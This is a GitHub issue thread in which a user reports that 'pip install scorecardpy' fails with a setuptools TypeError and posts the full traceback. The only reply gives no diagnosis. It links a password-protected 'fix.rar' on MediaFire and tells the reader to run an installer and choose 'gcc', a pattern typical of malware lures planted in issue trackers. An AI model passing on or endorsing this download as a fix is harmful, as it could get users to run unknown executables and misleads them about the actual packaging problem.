### ISSUE TITLE
pip install doesn't work

### ISSUE THREAD

**Issue by jwilliamn** [ShichenXie/scorecardpy#114]
Hello, 

I have tried to install the following way:
`pip install scorecardpy`

I have: 
- Python 3.10.8
- Pandas 2.2.2
- Setuptools 71.0.4

but got the following error: 
`
Collecting scorecardpy
  Using cached scorecardpy-0.1.9.7.tar.gz (58 kB)
  Preparing metadata (setup.py) ... error
  error: subprocess-exited-with-error
  
  × python setup.py egg_info did not run successfully.
  │ exit code: 1
  ╰─> [41 lines of output]
      running egg_info
      creating /tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info
      writing /tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info/PKG-INFO
      writing dependency_links to /tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info/dependency_links.txt
      writing requirements to /tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info/requires.txt
      writing top-level names to /tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info/top_level.txt
      writing manifest file '/tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info/SOURCES.txt'
      reading manifest file '/tmp/pip-pip-egg-info-8ttzakys/scorecardpy.egg-info/SOURCES.txt'
      reading manifest template 'MANIFEST.in'
      warning: no files found matching '*' under directory 'data'
      adding license file 'LICENSE'
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "/tmp/pip-install-0o8oas1y/scorecardpy_452fea612d7f4f42a250e406324b1909/setup.py", line 27, in <module>
          setup(
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/__init__.py", line 108, in setup
          return distutils.core.setup(**attrs)
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/_distutils/core.py", line 184, in setup
          return run_commands(dist)
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/_distutils/core.py", line 200, in run_commands
          dist.run_commands()
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 970, in run_commands
          self.run_command(cmd)
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/dist.py", line 956, in run_command
          super().run_command(command)
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 989, in run_command
          cmd_obj.run()
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 310, in run
          self.find_sources()
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 318, in find_sources
          mm.run()
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 544, in run
          self.prune_file_list()
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 610, in prune_file_list
          base_dir = self.distribution.get_fullname()
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/_core_metadata.py", line 266, in get_fullname
          return _distribution_fullname(self.get_name(), self.get_version())
        File "/home/ec2-user/anaconda3/envs/python3/lib/python3.10/site-packages/setuptools/_core_metadata.py", line 284, in _distribution_fullname
          canonicalize_version(version, strip_trailing_zero=False),
      TypeError: canonicalize_version() got an unexpected keyword argument 'strip_trailing_zero'
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
hint: See above for details.
`

Is it a setuptools problem? I have tried with a lower version but got the same problem

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
